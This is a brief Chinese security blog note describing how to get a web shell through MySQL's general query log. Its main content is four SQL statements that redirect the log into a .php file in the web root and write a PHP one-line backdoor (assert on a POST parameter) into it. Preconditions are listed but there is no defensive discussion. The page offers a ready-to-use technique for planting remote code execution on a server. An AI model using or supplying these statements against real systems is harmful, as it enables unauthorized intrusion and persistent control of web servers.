[笔记]Mysql通过日志拿shell

WEB安全   DYBOY  11123 2018-6-15 

标签: 学习笔记 SQL注入 web安全

Mysql通过日志拿shell

emmm~有点舒服

0x00 利用条件

  1. root

  2. 网站物理路径

  3. 文件位置未被限制

0x01 SQL语句

set global general_log = on;
set global general_log_file = 'C:/phpStudy/WWW/dyboy.php';
select '<?php @assert($_POST["dyboy"]); ?>';
set global general_log = off;
上一篇
[笔记]PHP过狗一句话
下一篇
[笔记]ASP过狗一句话

版权声明:《 [笔记]Mysql通过日志拿shell 》为DYBOY原创文章,转载请注明出处!
最后编辑:2018-6-15 14:06:21

相关推荐

11429人看过

PHP复杂变量绕过addslashes()直接拿shell

87165人看过

[爆破小记]分享一个简单的爆破脚本

72人看过

[代码审计]Emlog 5.3.1-暂不公开

10276人看过

[代码审计]XYCMS留言板V1.7

16727人看过

[渗透测试]Redis未授权访问漏洞利用

发表评论 / Comment

用心评论~


Warning: Cannot modify header information - headers already sent by (output started at /www/wwwroot/blog.dyboy.cn/content/templates/dyblog/footer.php:56) in /www/wwwroot/blog.dyboy.cn/include/lib/view.php on line 23